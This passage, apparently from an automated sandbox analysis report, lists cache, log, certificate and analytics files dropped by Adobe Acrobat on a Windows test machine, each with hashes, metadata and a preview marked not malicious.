                                                                                            Size (bytes):508
                                                                                            Entropy (8bit):5.052000810972757
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:YH/um3RA8sqaKsBdOg2H9CFcaq3QYiubxnP7E4TfF+:Y2sRdsxvdMHd3QYhbxP7np+
                                                                                            MD5:3598E5236604FFFDC52F400454CF37E4
                                                                                            SHA1:72D45E7F3FAC58DE865D6E68E6A6DE699988E9DB
                                                                                            SHA-256:E00F1A542748E25760A3E8B6DFE0B81C9FC04D89F56611AEA72443910907D7EC
                                                                                            SHA-512:8B544C33494BCAB7A49162184CBC3F9485535604FCE0C24C1DAA502EFB3E4D7E57B51B9239A78F742A946C5A1504E3C14ACB37BED385CB12B6E44F8F5F7FB955
                                                                                            Malicious:false
                                                                                            Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379169094999958","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":635259},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.5","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G","CAYSABiAgICA+P////8B":"Offline"}}}

                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

                                                                                            Download File
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):508
                                                                                            Entropy (8bit):5.047195090775108
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:YH/um3RA8sqnT/sBdOg2HXcaq3QYiubxnP7E4TfF+:Y2sRdsgTAdMHW3QYhbxP7np+
                                                                                            MD5:70321A46A77A3C2465E2F031754B3E06
                                                                                            SHA1:5E7E713285D36F12ACFC68A34D8A34FD33C96B34
                                                                                            SHA-256:344DA48DA0F9A5CC258E10D6C28086B7718CBE596CDC3D7A2A61C8F5FD781248
                                                                                            SHA-512:E885342B270FE3D538F17F8F80B9ED061B30EE55624177BD81F5C65C033160D71559D60872BC0F99C0C93FAE29F9D09FD5042B68D83CD538154D1335BAC8205D
                                                                                            Malicious:false
                                                                                            Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13340988966329963","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144691},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.5","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G","CAYSABiAgICA+P////8B":"Offline"}}}

                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State~RF5fe8db.TMP (copy)

                                                                                            Download File
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):508
                                                                                            Entropy (8bit):5.047195090775108
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:YH/um3RA8sqnT/sBdOg2HXcaq3QYiubxnP7E4TfF+:Y2sRdsgTAdMHW3QYhbxP7np+
                                                                                            MD5:70321A46A77A3C2465E2F031754B3E06
                                                                                            SHA1:5E7E713285D36F12ACFC68A34D8A34FD33C96B34
                                                                                            SHA-256:344DA48DA0F9A5CC258E10D6C28086B7718CBE596CDC3D7A2A61C8F5FD781248
                                                                                            SHA-512:E885342B270FE3D538F17F8F80B9ED061B30EE55624177BD81F5C65C033160D71559D60872BC0F99C0C93FAE29F9D09FD5042B68D83CD538154D1335BAC8205D
                                                                                            Malicious:false
                                                                                            Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13340988966329963","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144691},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.5","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G","CAYSABiAgICA+P////8B":"Offline"}}}

                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\a4885fb3-580f-4ad9-b314-d02daba4c149.tmp

                                                                                            Download File
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):508
                                                                                            Entropy (8bit):5.047195090775108
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:YH/um3RA8sqnT/sBdOg2HXcaq3QYiubxnP7E4TfF+:Y2sRdsgTAdMHW3QYhbxP7np+
                                                                                            MD5:70321A46A77A3C2465E2F031754B3E06
                                                                                            SHA1:5E7E713285D36F12ACFC68A34D8A34FD33C96B34
                                                                                            SHA-256:344DA48DA0F9A5CC258E10D6C28086B7718CBE596CDC3D7A2A61C8F5FD781248
                                                                                            SHA-512:E885342B270FE3D538F17F8F80B9ED061B30EE55624177BD81F5C65C033160D71559D60872BC0F99C0C93FAE29F9D09FD5042B68D83CD538154D1335BAC8205D
                                                                                            Malicious:false
                                                                                            Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13340988966329963","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144691},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.5","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G","CAYSABiAgICA+P////8B":"Offline"}}}

                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

                                                                                            Download File
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):4099
                                                                                            Entropy (8bit):5.237884550947825
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:QqBpCqGp3Al+NehBmkID2w6bNMhugoKTNY+No/KTNcygLPGLLUD0pr:rBpJGp3AoqBmki25ZEVoKTNY+NoCTNLZ
                                                                                            MD5:71A77F42522F7725F0D330F58D1711A8
                                                                                            SHA1:43DC01A7FCAAD3DEC8167521A57D193D63052FF5
                                                                                            SHA-256:A3B1891582FB1E7687920D3C1172B814A1C41296E708585E96D6CE669AC22698
                                                                                            SHA-512:D92D9FF62DF95BC9F9CF77EA9A47206424BF1C673EF65D65409260F69E0C081E41B90E3652DB163C26BC7BB2D3673CC05ED0BF695A52EB452C75704079917B2F
                                                                                            Malicious:false
                                                                                            Preview:*...#................version.1..namespace-.1a.o................next-map-id.1.Pnamespace-047a745d_5c98_4926_b446_942fb948d072-https://rna-resource.acrobat.com/.0.K..r................next-map-id.2.Snamespace-bdf2fbfe_e08b_407d_8a81_9a6094e373a0-https://rna-v2-resource.acrobat.com/.1.m.Fr................next-map-id.3.Snamespace-24b9c7f4_3e31_4d11_a607_ac91d6485c9e-https://rna-v2-resource.acrobat.com/.2.8.o................next-map-id.4.Pnamespace-bc60f291_faa7_4492_8b22_e186b4ce62c1-https://rna-resource.acrobat.com/.3.A-N^...............Pnamespace-047a745d_5c98_4926_b446_942fb948d072-https://rna-resource.acrobat.com/-j..^...............Pnamespace-bc60f291_faa7_4492_8b22_e186b4ce62c1-https://rna-resource.acrobat.com/[.|.a...............Snamespace-bdf2fbfe_e08b_407d_8a81_9a6094e373a0-https://rna-v2-resource.acrobat.com/....a...............Snamespace-24b9c7f4_3e31_4d11_a607_ac91d6485c9e-https://rna-v2-resource.acrobat.com/.W.@o................next-map-id.5.Pnamespace-8fb46ac3_c992_47ca_bb04_

                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG

                                                                                            Download File
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                            File Type:ASCII text
                                                                                            Category:dropped
                                                                                            Size (bytes):326
                                                                                            Entropy (8bit):5.217023496635218
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:7hXX+q2P92nKuAl9OmbzNMxIFUt8OhXDyWZmw+OhXDRVkwO92nKuAl9OmbzNMFLJ:7hH+v4HAa8jFUt8OhzyW/+OhzRV5LHAo
                                                                                            MD5:A6AEC9ABEA7CBF449AD8731AD526E802
                                                                                            SHA1:6582CE8215C13B97CDA8D75A3BF891F41B5E43BC
                                                                                            SHA-256:8B37450F5BF1230628A093D45C19B69844CD8C2C261606B7369C4B882F392AAD
                                                                                            SHA-512:92EB9BCD1B023DAD5C6E98EB9F809FB19F5BE0AAEE90C39A0E75DD5014CEED2703B1A020A481F587988D778330301CA9F8AE80343FC0D4F7A3EE0FB5BBFF533D
                                                                                            Malicious:false
                                                                                            Preview:2024/12/19-06:51:22.733 163c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/19-06:51:22.735 163c Recovering log #3.2024/12/19-06:51:22.735 163c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

                                                                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)

                                                                                            Download File
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                            File Type:ASCII text
                                                                                            Category:dropped
                                                                                            Size (bytes):326
                                                                                            Entropy (8bit):5.217023496635218
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:7hXX+q2P92nKuAl9OmbzNMxIFUt8OhXDyWZmw+OhXDRVkwO92nKuAl9OmbzNMFLJ:7hH+v4HAa8jFUt8OhzyW/+OhzRV5LHAo
                                                                                            MD5:A6AEC9ABEA7CBF449AD8731AD526E802
                                                                                            SHA1:6582CE8215C13B97CDA8D75A3BF891F41B5E43BC
                                                                                            SHA-256:8B37450F5BF1230628A093D45C19B69844CD8C2C261606B7369C4B882F392AAD
                                                                                            SHA-512:92EB9BCD1B023DAD5C6E98EB9F809FB19F5BE0AAEE90C39A0E75DD5014CEED2703B1A020A481F587988D778330301CA9F8AE80343FC0D4F7A3EE0FB5BBFF533D
                                                                                            Malicious:false
                                                                                            Preview:2024/12/19-06:51:22.733 163c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/19-06:51:22.735 163c Recovering log #3.2024/12/19-06:51:22.735 163c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

                                                                                            C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons\icon-241219115126Z-162.bmp

                                                                                            Download File
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:PC bitmap, Windows 3.x format, 107 x -152 x 32, cbSize 65110, bits offset 54
                                                                                            Category:dropped
                                                                                            Size (bytes):65110
                                                                                            Entropy (8bit):0.6376462682686903
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:Fn1AGmY2nTLKnzN4lu1/4uy47rHMMMxAz:FsY2XQzyQnuc
                                                                                            MD5:1468EB269F45D6EECE72317AF6B1587F
                                                                                            SHA1:AB52469CD54F341F71D8EEA78E5293C597CC2560
                                                                                            SHA-256:56B0D18154217AEBE5F78DAA5DAF7861967BB4B615B7D1FFCDBC3C98C8834393
                                                                                            SHA-512:FFEF2EC31529E6165D9549A150FC8DA65917002B81A8E4747853AC7F51D88B3AC545862D5EB39684064EE600140C9D0BDAA97D14067C01AA24B17419950781FA
                                                                                            Malicious:false
                                                                                            Preview:BMV.......6...(...k...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D

                                                                                            Download File
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                            File Type:Certificate, Version=3
                                                                                            Category:dropped
                                                                                            Size (bytes):1391
                                                                                            Entropy (8bit):7.705940075877404
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                                                            MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                                                            SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                                                            SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                                                            SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                                                            Malicious:false
                                                                                            Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......

                                                                                            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                            Download File
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                            File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                            Category:dropped
                                                                                            Size (bytes):71954
                                                                                            Entropy (8bit):7.996617769952133
                                                                                            Encrypted:true
                                                                                            SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                                            MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                                            SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                                            SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                                            SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                                            Malicious:false
                                                                                            Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

                                                                                            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D

                                                                                            Download File
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):192
                                                                                            Entropy (8bit):2.7673182398396405
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:kkFklJE06+M1fllXlE/HT8kPltNNX8RolJuRdxLlGB9lQRYwpDdt:kKR7+M2T8KNMa8RdWBwRd
                                                                                            MD5:0E851C22030F39D4EE8BFAB1BE9B6FF4
                                                                                            SHA1:8D22FCCA9B8C39113D9EEFAB9B8EDF8A47BA2C95
                                                                                            SHA-256:F9285359D3831AA3305D77B6D9592DA6570944F0C81308F97E889D1F3744669D
                                                                                            SHA-512:EF8E11C489A639597ADDBD2AC667847329FD1CBF8275AFAB76C1D5CAC90912605A1343B0C1FE0221D11DBFB0C9251F8B82F54B113F427605A90206594E9D3005
                                                                                            Malicious:false
                                                                                            Preview:p...... .........!.Y.R..(....................................................... ..........W....&...............o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...

                                                                                            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                            Download File
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                            File Type:data
                                                                                            Category:modified
                                                                                            Size (bytes):328
                                                                                            Entropy (8bit):3.111644377766766
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:kK1cbT9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:DDnLNkPlE99SNxAhUe/3
                                                                                            MD5:E7C4A46E4713D9EBA57181AAE30A67DD
                                                                                            SHA1:3943301213C2BC971A4A51EFA533121715BD3226
                                                                                            SHA-256:052BFAF0B1B32900B1157BD8D2FABB57D12CE3F52C77BF5669869F5464AA395E
                                                                                            SHA-512:6311A2E4FDCB964C73CF1336EE6400C6405B3F6751232BE9FD9ACAF76FC1AF6B2B7921B4AD9D480E3D83AF079AAA3BA81EF10FC47DACA0560740943A8B986F70
                                                                                            Malicious:false
                                                                                            Preview:p...... ...........l.R..(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

                                                                                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID

                                                                                            Download File
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):295
                                                                                            Entropy (8bit):5.337674492631912
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:YEQXJ2HXBi/2kY+FIbRI6XVW7+0YCDoAvJM3g98kUwPeUkwRe9:YvXKXBA2WYpW7DsGMbLUkee9
                                                                                            MD5:E4195F3C18C0CA74ACC6C780EB7BC033
                                                                                            SHA1:4293133A0D1E3BF109581FEB830E4EA7DDE8B73C
                                                                                            SHA-256:FB1881C0B43C409076B7C1381A0166B330B915E051E18F5936B8A92937A32206
                                                                                            SHA-512:112E4C7124CBF2702BBA749D700754D9846FEAD2357AAF785E9AEFC438D607B3D0FE6727045FE652C025CA12C73459FFFD38E72E1D9F4CBBA3D017E3EB70F539
                                                                                            Malicious:false
                                                                                            Preview:{"analyticsData":{"responseGUID":"60006622-2faa-41f5-824e-b05a897b1bfb","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734782538340,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface

                                                                                            Download File
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):294
                                                                                            Entropy (8bit):5.276485929430291
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:YEQXJ2HXBi/2kY+FIbRI6XVW7+0YCDoAvJfBoTfXpnrPeUkwRe9:YvXKXBA2WYpW7DsGWTfXcUkee9
                                                                                            MD5:2536F03169576F71D9931769B297EC68
                                                                                            SHA1:48E4ED08AFBD0227B83EAB628DB571397AD4BC97
                                                                                            SHA-256:01E99381DCD44DFFE89EF8C973F502C74E123D07BB4C67DC59403B1DC68B0F79
                                                                                            SHA-512:87F619974A6268F7A27E0D4C0DD020A360D9E81FFB816A8BAAAEBB9DA1AB1038FC0378FFF0CC7F2ED40FBEC0ECF4583D14F5EE3934958210818E95F584681955
                                                                                            Malicious:false
                                                                                            Preview:{"analyticsData":{"responseGUID":"60006622-2faa-41f5-824e-b05a897b1bfb","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734782538340,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface

                                                                                            Download File
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):294
                                                                                            Entropy (8bit):5.255683677399495
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:YEQXJ2HXBi/2kY+FIbRI6XVW7+0YCDoAvJfBD2G6UpnrPeUkwRe9:YvXKXBA2WYpW7DsGR22cUkee9
                                                                                            MD5:31DAD0126E2245E4751F7D4C199145F6
                                                                                            SHA1:03AC2F41B88F27715DD1DAB5F7934DEFBE9DDD6A
                                                                                            SHA-256:7278B4D4D18C46D02F5A1CC6ADCAF7F3C647CEB70BEB65EEF5C7B9C9DCABCF27
                                                                                            SHA-512:FE25827B9F6570E17AA8168CA2DCE84290E47D01907C116A80B84B9AA8F36C961F694996A639E35BBD8C9195A419BCF8CE74FB6503E881CB80DFC711BB1B76A0
                                                                                            Malicious:false
                                                                                            Preview:{"analyticsData":{"responseGUID":"60006622-2faa-41f5-824e-b05a897b1bfb","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734782538340,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD

                                                                                            Download File
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):285
                                                                                            Entropy (8bit):5.315666005595136
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:YEQXJ2HXBi/2kY+FIbRI6XVW7+0YCDoAvJfPmwrPeUkwRe9:YvXKXBA2WYpW7DsGH56Ukee9
                                                                                            MD5:B7FDD449988AFAF6AAC3C7CA49461772
                                                                                            SHA1:2B29CB70F1224676522E61988E07B3CD5FFAC6A5
                                                                                            SHA-256:2CA69EC38D7F42F6025C3F5542AAC64AF0A90A31AF521BD2ACFD568FDB8C2CF4
                                                                                            SHA-512:9B8D748D53FF586F9A01D8F1E8A9803E62FE19DDEC98782468148E8ECCB8FD8E4B42B1865D09CC589E0646837CE6A18161343237CB44A1374B81598B9B51264A
                                                                                            Malicious:false
                                                                                            Preview:{"analyticsData":{"responseGUID":"60006622-2faa-41f5-824e-b05a897b1bfb","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734782538340,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner

                                                                                            Download File
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):1123
                                                                                            Entropy (8bit):5.690620420952462
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:Yv6XBbi1pLgE9cQx8LennAvzBvkn0RCmK8czOCCSw1:YvEm1hgy6SAFv5Ah8cv/w1
                                                                                            MD5:31856526007C6E602937EF92A187C81D
                                                                                            SHA1:99D281C9D352B733580999D4AFBAC701F24FB201
                                                                                            SHA-256:3FC020D1655B27DF43C0D7FD210FFDE2937900A91355F9C3A835F228576705C4
                                                                                            SHA-512:F51CBE8988E2B4993F097DBBF187177E2FE50BE3303A7C3145FF6AFE001618814FB11DAA162D7623374DEEB5CB8C8D860144FD7B7495FDAA8032C84799584107
                                                                                            Malicious:false
                                                                                            Preview:{"analyticsData":{"responseGUID":"60006622-2faa-41f5-824e-b05a897b1bfb","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734782538340,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh

                                                                                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner

                                                                                            Download File
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):289
                                                                                            Entropy (8bit):5.264430585717715
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:YEQXJ2HXBi/2kY+FIbRI6XVW7+0YCDoAvJf8dPeUkwRe9:YvXKXBA2WYpW7DsGU8Ukee9
                                                                                            MD5:39914BE3983121E1836A01ACA6F93528
                                                                                            SHA1:7CE6793C231FF1D7F5A55DE048AA7DFCB0F0ACDA
                                                                                            SHA-256:54A593F8F0DC7B0B3EB70AECE3D237F88FD2283A768183BAA5F9C8D2056B61FA
                                                                                            SHA-512:6D208C8FF7C4303296655674468EEE6C31AC6D2D11308914281826F96424FF35468DB6EC34AAE876F77E441B16DC3EFEDEEA6AE169C2F42FE697B5432DBE9E24
                                                                                            Malicious:false
                                                                                            Preview:{"analyticsData":{"responseGUID":"60006622-2faa-41f5-824e-b05a897b1bfb","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734782538340,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention

                                                                                            Download File
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
